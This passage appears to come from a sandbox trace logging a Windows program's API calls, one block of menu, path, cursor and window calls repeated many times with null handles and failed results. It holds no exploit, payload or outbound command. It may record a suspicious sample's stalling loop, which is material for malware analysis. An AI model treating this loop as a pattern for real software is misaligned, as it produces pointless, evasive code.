(hMenu=0x0, nPos=-1) returned 0x0 [0027.677] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.677] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.677] GetStockObject (i=6) returned 0x1b00018 [0027.677] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.677] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.677] PathFileExistsW (pszPath=0x0) returned 0 [0027.677] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.677] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.677] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.677] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.677] GetMenu (hWnd=0x0) returned 0x0 [0027.677] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3b4) returned -1 [0027.677] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.677] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.677] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.677] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.677] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.677] GetStockObject (i=6) returned 0x1b00018 [0027.677] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.677] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.677] PathFileExistsW (pszPath=0x0) returned 0 [0027.677] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.677] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.677] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.677] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.677] GetMenu (hWnd=0x0) returned 0x0 [0027.677] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.677] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.677] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.677] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.677] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.677] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.678] GetStockObject (i=6) returned 0x1b00018 [0027.678] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.678] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.678] PathFileExistsW (pszPath=0x0) returned 0 [0027.678] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.678] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.678] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.678] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.678] GetMenu (hWnd=0x0) returned 0x0 [0027.678] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.678] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.678] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.678] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.678] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.678] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.678] GetStockObject (i=6) returned 0x1b00018 [0027.678] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.678] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.678] PathFileExistsW (pszPath=0x0) returned 0 [0027.678] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.678] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.678] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.678] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.678] GetMenu (hWnd=0x0) returned 0x0 [0027.678] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.678] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.678] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.678] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.678] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.678] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.678] GetStockObject (i=6) returned 0x1b00018 [0027.678] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.678] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.678] PathFileExistsW (pszPath=0x0) returned 0 [0027.679] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.679] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.679] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.679] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.679] GetMenu (hWnd=0x0) returned 0x0 [0027.679] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.679] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.679] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.679] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.679] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.679] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.679] GetStockObject (i=6) returned 0x1b00018 [0027.679] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.679] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.679] PathFileExistsW (pszPath=0x0) returned 0 [0027.679] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.679] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.679] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.679] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.679] GetMenu (hWnd=0x0) returned 0x0 [0027.679] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x598) returned -1 [0027.679] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.679] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.679] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.679] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.679] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.679] GetStockObject (i=6) returned 0x1b00018 [0027.679] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.679] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.679] PathFileExistsW (pszPath=0x0) returned 0 [0027.679] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.679] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.679] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.680] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.680] GetMenu (hWnd=0x0) returned 0x0 [0027.680] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.680] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.680] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.680] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.680] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.680] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.680] GetStockObject (i=6) returned 0x1b00018 [0027.680] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.680] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.680] PathFileExistsW (pszPath=0x0) returned 0 [0027.680] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.680] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.680] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.680] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.680] GetMenu (hWnd=0x0) returned 0x0 [0027.680] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.680] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.680] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.680] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.680] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.680] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.680] GetStockObject (i=6) returned 0x1b00018 [0027.680] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.680] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.680] PathFileExistsW (pszPath=0x0) returned 0 [0027.680] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.680] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.680] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.680] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.680] GetMenu (hWnd=0x0) returned 0x0 [0027.680] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.681] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.681] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.681] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.681] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.681] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.681] GetStockObject (i=6) returned 0x1b00018 [0027.681] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.681] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.681] PathFileExistsW (pszPath=0x0) returned 0 [0027.681] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.681] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.681] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.681] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.681] GetMenu (hWnd=0x0) returned 0x0 [0027.681] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.681] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.681] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.681] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.681] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.681] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.681] GetStockObject (i=6) returned 0x1b00018 [0027.681] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.681] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.681] PathFileExistsW (pszPath=0x0) returned 0 [0027.681] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.681] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.681] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.681] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.681] GetMenu (hWnd=0x0) returned 0x0 [0027.681] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2a3) returned -1 [0027.681] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.681] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.681] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.682] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.682] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.682] GetStockObject (i=6) returned 0x1b00018 [0027.682] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.682] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.682] PathFileExistsW (pszPath=0x0) returned 0 [0027.682] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.682] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.682] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.682] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.682] GetMenu (hWnd=0x0) returned 0x0 [0027.682] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.682] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.682] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.682] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.682] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.682] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.682] GetStockObject (i=6) returned 0x1b00018 [0027.682] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.682] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.682] PathFileExistsW (pszPath=0x0) returned 0 [0027.682] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.682] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.682] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.682] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.682] GetMenu (hWnd=0x0) returned 0x0 [0027.682] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.682] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.682] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.682] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.682] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.682] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.682] GetStockObject (i=6) returned 0x1b00018 [0027.683] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.683] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.683] PathFileExistsW (pszPath=0x0) returned 0 [0027.683] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.683] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.683] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.683] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.683] GetMenu (hWnd=0x0) returned 0x0 [0027.683] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.683] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.683] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.683] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.683] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.683] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.683] GetStockObject (i=6) returned 0x1b00018 [0027.683] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.683] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.683] PathFileExistsW (pszPath=0x0) returned 0 [0027.683] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.683] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.683] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.683] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.683] GetMenu (hWnd=0x0) returned 0x0 [0027.684] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.684] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.684] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.684] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.684] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.684] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.684] GetStockObject (i=6) returned 0x1b00018 [0027.684] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.684] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.684] PathFileExistsW (pszPath=0x0) returned 0 [0027.684] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.684] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.684] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.684] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.684] GetMenu (hWnd=0x0) returned 0x0 [0027.684] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xc8) returned -1 [0027.684] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.684] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.684] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.684] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.684] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.684] GetStockObject (i=6) returned 0x1b00018 [0027.684] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.684] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.684] PathFileExistsW (pszPath=0x0) returned 0 [0027.684] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.684] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.684] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.684] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.684] GetMenu (hWnd=0x0) returned 0x0 [0027.684] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.684] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.684] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.685] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.685] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.685] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.685] GetStockObject (i=6) returned 0x1b00018 [0027.685] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.685] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.685] PathFileExistsW (pszPath=0x0) returned 0 [0027.685] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.685] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.685] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.685] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.685] GetMenu (hWnd=0x0) returned 0x0 [0027.685] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.685] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.685] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.685] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.685] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.685] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.685] GetStockObject (i=6) returned 0x1b00018 [0027.685] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.685] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.685] PathFileExistsW (pszPath=0x0) returned 0 [0027.685] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.685] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.685] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.685] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.685] GetMenu (hWnd=0x0) returned 0x0 [0027.685] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.685] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.685] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.685] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.685] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.686] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.686] GetStockObject (i=6) returned 0x1b00018 [0027.686] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.686] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.686] PathFileExistsW (pszPath=0x0) returned 0 [0027.686] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.686] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.686] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.686] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.686] GetMenu (hWnd=0x0) returned 0x0 [0027.686] 